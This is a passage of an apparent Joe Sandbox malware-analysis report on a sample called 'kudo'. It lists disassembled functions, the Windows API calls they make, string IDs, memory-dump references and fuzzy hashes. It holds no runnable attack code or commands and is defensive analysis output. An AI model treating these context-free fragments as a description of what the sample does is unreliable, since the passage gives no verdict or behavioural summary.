                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: 8f7d38fc94be1d01e8560514806331cd2497f4b6178267d3ee7e47745c0f6d10
                                                      • Instruction ID: ee137e3bb6b21752acffe6c2947d498fcbae0b508b970491c729687f76e0de8d
                                                      • Opcode Fuzzy Hash: 8f7d38fc94be1d01e8560514806331cd2497f4b6178267d3ee7e47745c0f6d10
                                                      • Instruction Fuzzy Hash: 5001B171A41108ABDF15EBA4CD52AFE77A8FF15341F10002ABD15F72D1DE245A0CD672
                                                      Function 00858D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00858DEE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: ec0729d1938823f53c240df483b89846ca54b7420ab7d35dbbc01bef1a1724f8
                                                      • Instruction ID: edeb968316e95ccc5a150f745f1d15e6416d3ea101c20bbe823064bf329e0a22
                                                      • Opcode Fuzzy Hash: ec0729d1938823f53c240df483b89846ca54b7420ab7d35dbbc01bef1a1724f8
                                                      • Instruction Fuzzy Hash: 77018F71A41109ABDB15EAA8CD82AFE77A8FB11301F100126BC15F32D2DA255E0CD672
                                                      Function 00864F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp
                                                      • String ID: #32770
                                                      • API String ID: 2292705959-463685578
                                                      • Opcode ID: 72df19c92063555bfc75f9bdc3637129d8e829694ceda0b1a8fe24e33ac9db10
                                                      • Instruction ID: 394378f56aced29eb3deedefa220b85e4f4d91fbbf3c6f77dcf07d96c6bba294
                                                      • Opcode Fuzzy Hash: 72df19c92063555bfc75f9bdc3637129d8e829694ceda0b1a8fe24e33ac9db10
                                                      • Instruction Fuzzy Hash: A8E0D8326002386BE720AB99AC49FA7F7ACFB55B70F110067FD04D3151E970AA55CBE1
                                                      Function 0083B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0083B314: _memset.LIBCMT ref: 0083B321
                                                        • Part of subcall function 00820940: InitializeCriticalSectionAndSpinCount.KERNEL32(008C4158,00000000,008C4144,0083B2F0,?,?,?,0080100A), ref: 00820945
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0080100A), ref: 0083B2F4
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0080100A), ref: 0083B303
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0083B2FE
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 3158253471-631824599
                                                      • Opcode ID: 08a7f7f38d06424827b909911407464b84e69f28d59d7b6b0fd7e879ff1fe70e
                                                      • Instruction ID: f60e9e34e428cd3605b796f1d2e423cd8d998e84c9b6fa09494f00444163a086
                                                      • Opcode Fuzzy Hash: 08a7f7f38d06424827b909911407464b84e69f28d59d7b6b0fd7e879ff1fe70e
                                                      • Instruction Fuzzy Hash: 53E06DB02007218BE760EF6CE8047427AE4FF40304F00892CE656C7742EBB4E488CBA1
                                                      Function 00841935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00841775
                                                        • Part of subcall function 0087BFF0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 0087BFFE
                                                        • Part of subcall function 0087BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,0084195E,?), ref: 0087C010
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0084196D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                      • String ID: WIN_XPe
                                                      • API String ID: 582185067-3257408948
                                                      • Opcode ID: c16f021edc6bb5da019fcf3b98605715d338468630bbbd94149e8f16f4718165
                                                      • Instruction ID: 3285f1c3a59126b879a2fe72e0991b79f810a0d7a3d5537af48884ec861b28ef
                                                      • Opcode Fuzzy Hash: c16f021edc6bb5da019fcf3b98605715d338468630bbbd94149e8f16f4718165
                                                      • Instruction Fuzzy Hash: 18F01E7080100CEFCB25DBA4C988AECBBB8FB08304F600095E112E20A5DB319E84CF24
                                                      Function 00885998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008859AE
                                                      • PostMessageW.USER32(00000000), ref: 008859B5
                                                        • Part of subcall function 00865244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008652BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 7cdb5b18e65eec6e3d252d7d169bb26fe30aa7207673c262dfee646c29d8ba39
                                                      • Instruction ID: cd49a699953ea6f08209209bcaa5fd7e877a2ee0ceba2943a063f07a9da2a45b
                                                      • Opcode Fuzzy Hash: 7cdb5b18e65eec6e3d252d7d169bb26fe30aa7207673c262dfee646c29d8ba39
                                                      • Instruction Fuzzy Hash: 9AD0C931380311BAE6A4BB74DC0BFD76614FB14B50F010825B355EA2D1D9E4A800CB54
                                                      Function 00885964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0088596E
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00885981
                                                        • Part of subcall function 00865244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008652BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: bd08d4642b8e729353fe22367c80256f2708fd50546625b52efa7250f7191301
                                                      • Instruction ID: 0212e04a047e314a3e190338392c3cf6bb2ddc0ba099a2a30cbd636c089ff491
                                                      • Opcode Fuzzy Hash: bd08d4642b8e729353fe22367c80256f2708fd50546625b52efa7250f7191301
                                                      • Instruction Fuzzy Hash: 06D0C931384311B6E6A4BB74DC1BFD76A14FB10B50F010825B359EA2D1D9E4A800CB54